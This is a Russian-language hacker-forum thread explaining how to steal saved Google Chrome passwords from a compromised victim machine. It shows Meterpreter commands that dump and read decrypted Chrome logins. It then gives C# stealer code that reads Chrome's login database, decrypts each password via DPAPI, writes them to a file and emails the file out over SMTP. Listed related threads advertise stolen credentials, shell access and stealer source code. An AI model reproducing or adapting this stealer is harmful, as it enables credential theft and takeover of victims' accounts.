Воруем пароли из Google Chrome

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Итак, что мы хотим? Допустим, нам удалось каким либо образом похекать компутер жертвы, это здорово, но мы хотим, разумеется его аккаунт на форуме Кодеби, чтобы почитать приватики. Юзверь оказался неПальцемДеланный и использует разные пароли от разных ресурсов.

Давайте же посмотрим, как мы можем вытащить эти пароли мощью прекрасного метерпретера.

Каким либо образом получаем сессию метерпретера

Посмотреть вложение 7218

А далее используем следующий модуль

Код:
run post/windows/gather/enum_chrome
Посмотреть вложение 7219
После чего смотрим исходный файл
Код:
cat /root/.msf4/loot/20170122102848_default_192.168.1.222_chrome.decrypted_217283.txt
Посмотреть вложение 7220

Ура джедайская сила метeрпретера справилась с поставленной задачей и вывело нам логин и пароль [email protected]:[email protected]



Ну это было бы слишком просто для статьи. А что если у нас нет метерпретера?

Задача: Написать свой стиллер, который будет расшифровывать пароли GoogleChrome и отсылать на почту.

Для начала поговорим о DPAPI(Data Protection Application Programming Interface) – Майкрософт, как и многие компании столкнулась с проблемой шифрования данных, которые могут быть расшифрованы только на стороне клиента. В итоге был создан алгоритм на основе мастер – ключа.



Мастер – ключ - это комбинация следующих элементов:

  • SID — уникальный идентификатор безопасности.
  • HMAC (сокращение от англ. hash-based message authentication code, хеш-код идентификации сообщений).
  • PBKDF2 – Password-Based Key Derivation Function. Стандарт формирования ключа на основе пароля. Использует псевдослучайную функцию для получения ключей.
  • MasterKey BLOB — это как раз данные с зашифрованным ключом.
Подробнее почитать тут

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Отсюда следует главный вывод, что расшифровать пароли хрома можно только там где они были созданы.

Давайте напишем такой стиллер.

Установим SQLLITE уже известным нам менеджером установки пакетов и добавим следующий код:

Код:
string fileDb = @"C:\Users\Codeby\AppData\Local\Google\Chrome\User Data\Default\Login Data"; // Путь к логин данным
string connectionString = $"Data Source = {fileDb}";
string fileName = @"C:\Temp\output.txt"; // Выходной файл с паролями
StreamWriter sw = new StreamWriter(fileName, false, Encoding.UTF8);
string dbWay = "Login Data";
string db_fields = "logins"; // база паролей SQLITE
byte[] entropy = null;
string description;

DataTable db = new DataTable();
            string sql = $"SELECT * FROM {db_fields}";
            using (SQLiteConnection connection = new SQLiteConnection(connectionString))
            {
                SQLiteCommand command = new SQLiteCommand(sql, connection);
                SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);
                adapter.Fill(db);
            }

            int rows = db.Rows.Count;
            Console.WriteLine($"Всего записей: {rows}");

            for (int i = 0; i < rows; i++)
            {
                string url = db.Rows[i][1].ToString();
                string login = db.Rows[i][3].ToString();
                byte[] byteArray = (byte[])db.Rows[i][5];
                byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);
                string password = new UTF8Encoding(true).GetString(decrypted);
                sw.WriteLine("----------------------------");
                sw.WriteLine($"Номер: {i}");
                sw.WriteLine($"Сайт: {url}");
                sw.WriteLine($"Логин: {login}");
                sw.WriteLine($"Пароль: {password}");
            }
            sw.Close();

            MailSend.SendMail("smtp.mail.ru", "[email protected]", "123qweasd", "[email protected]", "Пароли", fileName, fileName);
            Console.ReadKey();



Код класса DPAPI Взят отсюда

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Код отправки сообщений на шарпе приводится не будет в целях безопасности.

В итоге получаем профит.
Посмотреть вложение 7221
Посмотреть вложение 7222
Всем спасибо.

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

 
M

MrEzzY

Спасибо! Только что искал такую инфу
 
Название темы
Автор Заголовок Раздел Ответы Дата
S Воруем с камер хранения Способы заработка 12
B Воруем ключи супермаркета Способы заработка 2
Support81 Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев Новости в сети 0
balof Интересно Находим чужие пароли в Google Полезные статьи 0
Denik Интересно Обнаружена вредоносная программа, которая крадет сохраненные пароли из популярных браузеров Новости в сети 0
H Продам Рутовые шелы, пароли админов, доступы к бд, сорцы, видеонаблюдение, доступы к CISCO, данные сотрудников в одном крупном иностранном казино. Доступы - FTP, shell'ы, руты, sql-inj, БД 3
Denik Интересно Угоняем логины и пароли с фишинговых сайтов Полезные статьи 3
Denik Интересно Как взломать пароли с помощью флэшки Уязвимости и взлом 3
D Как вытащить пароли? Вопросы и интересы 1
R Пробью пароли по логину или почте Другое 1
I Исходники стиллера NoFile (пароли, куки, wallet.dat ,телеграмы, скайпы) С/C++ 0
S Вы мне мыло, я вам пароли AntiPublic Полезные статьи 7
J как достать пароли с куки Вопросы и интересы 5
J как достать пароли с куки Вопросы и интересы 1
G WordSteal - Похищаем пароли Windows Kali Linux 0
A Логины и пароли студентов Раздача (аккаунтов/ключей) 4
Admin Заводские логины и пароли IP-камер которые стоят по умолчанию Уязвимости и взлом 0
Support81 ФБР объявила охоту на владельца ботнет-сети из Молдовы Новости в сети 0
El_IRBIS Интересно Удали себя из интернета: JustDelete. Анонимность и приватность 0
Support81 10 из 10: В Linux обнаружен встроенный бэкдор (CVE-2024-3094) Новости в сети 0
M Работа для соискателей из РФ и РБ. Предоставляю работу. Ищу специалиста. 1
turbion0 Мошенники выманили у пенсионерки из Минска более 760 тыс. евро Новости в сети 2
TrashHellSoDomy В ПОЕЗДЕ 18+ ..история из жизни(видео) Юмор 1
turbion0 Россиянка украла из офиса бумагу на 24 миллиона рублей и купила себе квартиру Новости в сети 1
Support81 "Боюсь мобилизации". Украинские IT-шники удивляют абсурдными мыслями о возвращении из-за границы Новости в сети 3
Support81 Разработчики Tor Project удалили из сети ряд узлов из-за коммерческой и рискованной деятельности Новости в сети 0
Support81 Кибершпионы из Нью-Дели: как индийская IT-фирма взламывала мир Новости в сети 0
Support81 Группировка RansomedVC объявила о закрытии из-за возможных арестов Новости в сети 0
eyegod Ожидает оплаты ✅Взлом/доступ мессенджеров,соц.сетей,почт,сайтов | Удаленный доступ | Очистка КИ/Информации из сети⚡ Ищу работу. Предлагаю свои услуги. 1
Support81 Сетевая осада ХАМАС: на Израиль обрушилась серия кибератак из сектора Газа Новости в сети 0
Support81 Специалисты FACCT установили связь вымогателей Shadow c хактивистами из группы Twelve Новости в сети 0
Support81 Шокирующая правда о Cl0p: эксперты выяснили, из какой страны работают хакеры Новости в сети 0
ProxysalePro Резидентские прокси ipv4 из 200 стран мира Дедики/VPN/соксы/ssh 0
yaNaSvyazi Подборка из 70 нейросетей Способы заработка 0
VektorPechati Продавец ✔ «Vektor» - лазерная гравировка печатей из резины ( Анонимно | Быстро | Надёжно ) Ищу работу. Предлагаю свои услуги. 165
Digital Guard RP Удаление из интернета - отзывы - статьи - компромат - видео ролики - анкеты Ищу работу. Предлагаю свои услуги. 7
P Закрыто Удаление негативной информации из интернета: SERM, Ютуб, Статьи, Страницы, Аккаунты, Информации о персоне, Создание имиджа, Дадим огласку мошенникам. Корзина 1
Q Интересно 60$ на трафике из тик тока и ютуба Спам, рассылки, трафик, SEO 0
P Закрыто ✔ «Vektor» - лазерная гравировка печатей из резины ( Анонимно | Быстро | Надёжно ) Корзина 26
Beez Совсем новая тема заработка из-за бугра! 800$ Способы заработка 0
M Куплю запрос на покупку из ваших логов Куплю/Продам 2
S Куплю Бот по скупу TELEGRAM | От 5-7₽ | TDATA - папка из логов Куплю/Продам 0
Zarik3232 Продам База из 50 телеграмм ботов со скидками на электронику еду кино такси промокоды отрисовку фейкпереписку смс-бомберы флуд и тд Куплю/Продам 53
st.ap Схема по заработку на конвертации трафика из ютуба на кинопартнёрку. Способы заработка 1
P как извлечь из файлов .bin файлы с помощью UltraISO ? Вопросы и интересы 1
Denik Интересно 6000 Пользователей Coinbase пострадали из-за бага многофакторной аутентификации Новости в сети 0
Denik Интересно Найден Android-троян, ворующий данные из 378 приложений Новости в сети 1
W Слив [Андрей Коган] Курс по поставкам из Китая (2021) Способы заработка 0
D Как из обычного шнура сделать шнур juice jacking? Уязвимости и взлом 7
DOMINUS Интересно «IT гик» — Главные новости из мира IT-индустрии Новости в сети 5

Название темы